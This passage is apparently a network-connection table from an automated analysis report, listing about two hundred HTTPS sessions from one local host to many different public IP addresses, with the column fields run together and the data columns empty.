                                                      13873192.168.2.143612442.49.234.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13874192.168.2.144588489.192.67.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13875192.168.2.143670839.146.182.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13876192.168.2.145548054.113.10.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13877192.168.2.146001278.39.29.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13878192.168.2.1444716159.77.243.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13879192.168.2.1449408163.173.238.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13880192.168.2.1444190171.221.32.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13881192.168.2.145475438.181.249.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13882192.168.2.144928851.140.118.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13883192.168.2.145964886.210.70.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13884192.168.2.1433220192.142.158.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13885192.168.2.145498479.174.236.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13886192.168.2.143899863.168.194.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13887192.168.2.145691866.231.224.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13888192.168.2.1433708200.22.224.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13889192.168.2.145801468.186.254.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13890192.168.2.1436786186.160.7.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13891192.168.2.144135282.20.63.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13892192.168.2.1432996109.249.39.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13893192.168.2.145793083.221.18.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13894192.168.2.145210424.189.119.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13895192.168.2.1436938117.86.27.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13896192.168.2.145401893.10.21.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13897192.168.2.145534427.129.95.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13898192.168.2.1453230175.174.57.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13899192.168.2.144838074.100.41.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13900192.168.2.145745476.112.186.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13901192.168.2.1433136119.112.187.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13902192.168.2.143824254.201.14.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13903192.168.2.1455802124.40.232.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13904192.168.2.1435418131.54.36.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13905192.168.2.143731092.205.24.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13906192.168.2.1434266204.86.118.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13907192.168.2.1445640206.36.26.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13908192.168.2.1447426198.54.17.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13909192.168.2.1433800155.254.205.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13910192.168.2.145157018.62.30.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13911192.168.2.1440718156.154.88.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13912192.168.2.1457582145.73.223.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13913192.168.2.145299814.15.139.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13914192.168.2.145874827.7.199.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13915192.168.2.1436364108.218.170.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13916192.168.2.1441630219.253.97.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13917192.168.2.145624886.156.16.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13918192.168.2.1438864183.33.93.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13919192.168.2.145319854.213.83.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13920192.168.2.1451892177.205.253.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13921192.168.2.1454640194.142.252.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13922192.168.2.1434416158.62.55.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13923192.168.2.1437770191.62.17.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13924192.168.2.1459832188.2.254.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13925192.168.2.1436768179.34.240.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13926192.168.2.1436414121.185.151.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13927192.168.2.145150648.155.170.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13928192.168.2.143519631.51.66.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13929192.168.2.1438612171.50.79.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13930192.168.2.1453266145.102.65.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13931192.168.2.145734435.4.135.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13932192.168.2.144316435.106.125.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13933192.168.2.1440152131.72.50.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13934192.168.2.145024651.80.221.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13935192.168.2.1450514164.94.215.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13936192.168.2.144544862.217.226.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13937192.168.2.1449876173.195.5.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13938192.168.2.145887099.146.122.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13939192.168.2.143649682.231.229.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13940192.168.2.1450180156.221.41.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13941192.168.2.143440061.177.88.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13942192.168.2.1441064153.42.170.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13943192.168.2.144309093.13.153.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13944192.168.2.143408268.162.30.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13945192.168.2.14595988.185.81.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13946192.168.2.145296869.107.172.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13947192.168.2.143365468.44.48.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13948192.168.2.145292835.34.97.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13949192.168.2.144123069.6.237.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13950192.168.2.145873458.238.149.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13951192.168.2.1448688170.194.156.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13952192.168.2.143682834.94.11.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13953192.168.2.14596161.96.249.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13954192.168.2.1435798157.21.189.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13955192.168.2.1433878110.37.102.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13956192.168.2.143800454.16.15.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13957192.168.2.14492728.128.129.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13958192.168.2.1458304216.70.120.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13959192.168.2.144697834.225.105.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13960192.168.2.144047275.15.42.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13961192.168.2.1443474222.61.39.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13962192.168.2.1444176190.229.80.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13963192.168.2.143949046.192.13.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13964192.168.2.146094635.255.250.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13965192.168.2.1433556137.217.67.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13966192.168.2.144677285.217.125.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13967192.168.2.1438090154.204.53.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13968192.168.2.1438008122.127.190.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13969192.168.2.145483863.30.14.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13970192.168.2.1457076217.129.237.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13971192.168.2.1442134203.156.155.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13972192.168.2.1445942171.61.214.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13973192.168.2.1440112168.149.5.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13974192.168.2.1447506202.203.118.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13975192.168.2.145761258.99.248.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13976192.168.2.145592642.20.223.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13977192.168.2.145751020.216.242.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13978192.168.2.145546223.35.243.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13979192.168.2.143723084.64.136.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13980192.168.2.1444594169.188.101.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13981192.168.2.1454674139.20.172.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13982192.168.2.1458956190.204.240.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13983192.168.2.1458980202.172.143.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13984192.168.2.143404072.112.221.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13985192.168.2.144234267.25.77.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13986192.168.2.1448160117.130.120.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13987192.168.2.144798831.249.219.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13988192.168.2.144325420.132.129.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13989192.168.2.145047678.191.197.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13990192.168.2.1450404198.208.88.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13991192.168.2.145451651.66.43.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13992192.168.2.1439044157.203.157.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13993192.168.2.143382489.124.14.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13994192.168.2.1450594155.9.127.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13995192.168.2.144367468.49.220.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13996192.168.2.144350842.166.144.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13997192.168.2.1434428189.207.0.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13998192.168.2.144198846.206.133.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13999192.168.2.145447063.128.29.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14000192.168.2.144008440.195.8.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14001192.168.2.145444240.138.234.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14002192.168.2.1456570181.207.198.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14003192.168.2.14550965.196.100.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14004192.168.2.143576489.125.136.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14005192.168.2.1459640114.181.160.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14006192.168.2.1456932100.170.171.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14007192.168.2.1450342185.108.30.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14008192.168.2.1439122200.162.241.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14009192.168.2.144491097.65.203.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14010192.168.2.143319259.104.7.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14011192.168.2.145401663.168.197.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14012192.168.2.1439178195.83.89.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14013192.168.2.143833298.153.125.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14014192.168.2.1434010112.191.182.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14015192.168.2.1459722191.21.47.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14016192.168.2.143549227.181.88.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14017192.168.2.1454964208.247.42.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14018192.168.2.1444768161.2.24.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14019192.168.2.1445300197.235.214.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14020192.168.2.1455304203.99.0.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14021192.168.2.1438776135.156.27.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14022192.168.2.1451964102.253.241.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14023192.168.2.145962638.57.155.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14024192.168.2.1445124166.152.151.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14025192.168.2.1434542207.222.104.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14026192.168.2.1458794201.229.126.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14027192.168.2.145034418.41.144.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14028192.168.2.145789867.112.27.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14029192.168.2.145614039.251.221.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14030192.168.2.1443410203.28.167.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14031192.168.2.1441184177.246.142.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14032192.168.2.1447568206.208.32.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14033192.168.2.1433550211.37.91.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14034192.168.2.1436188126.74.103.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14035192.168.2.1460716147.0.251.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14036192.168.2.144288884.185.49.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14037192.168.2.144308254.217.3.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14038192.168.2.144129897.151.20.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14039192.168.2.1460982187.234.53.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14040192.168.2.144462868.203.113.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14041192.168.2.1457498132.136.248.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14042192.168.2.144062825.163.88.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14043192.168.2.144684053.99.67.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14044192.168.2.145978267.190.83.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14045192.168.2.143689661.191.243.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14046192.168.2.146096877.193.150.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14047192.168.2.144781651.67.103.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14048192.168.2.145597224.240.96.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14049192.168.2.1457782171.196.80.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14050192.168.2.14494385.67.143.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14051192.168.2.1434158104.41.74.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14052192.168.2.145868895.11.246.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14053192.168.2.1458584181.183.68.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14054192.168.2.1441078108.83.127.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14055192.168.2.1437278129.44.157.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14056192.168.2.143641686.149.180.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14057192.168.2.143844074.78.83.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14058192.168.2.1440244203.14.125.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14059192.168.2.1454854182.142.219.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14060192.168.2.144139231.37.104.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14061192.168.2.1439290195.223.206.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14062192.168.2.1444596166.254.128.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14063192.168.2.145935853.185.234.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14064192.168.2.1456732207.81.126.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14065192.168.2.1457634158.182.88.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14066192.168.2.1446070112.215.71.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14067192.168.2.1453210166.69.234.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14068192.168.2.1459822192.243.151.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14069192.168.2.144368095.94.212.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14070192.168.2.1438950175.166.127.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14071192.168.2.1440904190.141.85.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14072192.168.2.143969467.93.103.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14073192.168.2.1450430100.146.220.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14074192.168.2.1447294203.99.160.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14075192.168.2.145772095.51.90.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14076192.168.2.143345879.247.125.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14077192.168.2.144683252.228.184.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14078192.168.2.1444726201.54.76.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14079192.168.2.1447746223.3.199.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14080192.168.2.1434948152.32.201.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14081192.168.2.1445182153.27.71.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14082192.168.2.1436228195.132.55.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14083192.168.2.143867086.159.71.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14084192.168.2.1456420218.237.195.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14085192.168.2.1455384177.183.176.65443
                                                      TimestampBytes transferredDirectionData


